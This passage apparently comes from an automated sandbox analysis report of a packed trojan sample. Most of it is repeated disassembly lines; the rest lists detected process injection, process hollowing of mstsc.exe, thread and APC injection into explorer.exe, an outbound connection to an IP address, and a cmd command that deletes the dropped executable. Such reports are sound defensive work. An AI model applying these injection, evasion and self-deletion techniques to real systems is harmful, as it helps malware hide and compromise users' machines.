          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0138740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01336C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01336C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01336C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01336C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01336CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01336CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01336CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01388CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E3F33 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0138070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0138070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E4710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01388F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371751 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01337794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01337794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01337794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01371608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01380EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01380EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01380EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_012F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01388ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0479746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04834496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047A3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047A3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047A3C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04848CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_048314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0484740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0484740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0484740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0480C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_0480C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeMemory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: unknown protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 2896
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: AB0000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 9C6008
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: explorer.exe, 00000002.00000000.687108455.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000002.00000000.687502736.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000006.00000002.1032343786.0000000003000000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1029188263.00000000013D0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000000.687502736.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000006.00000002.1032343786.0000000003000000.00000002.00000001.sdmp, explorer.exe, 00000010.00000003.881834324.0000000006499000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: WerFault.exe, 0000000A.00000003.731420901.000001EDC784C000.00000004.00000001.sdmpBinary or memory string: GetProgmanWindow
          Source: explorer.exe, 00000002.00000000.687502736.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000006.00000002.1032343786.0000000003000000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1029188263.00000000013D0000.00000002.00000001.sdmpBinary or memory string: Progman
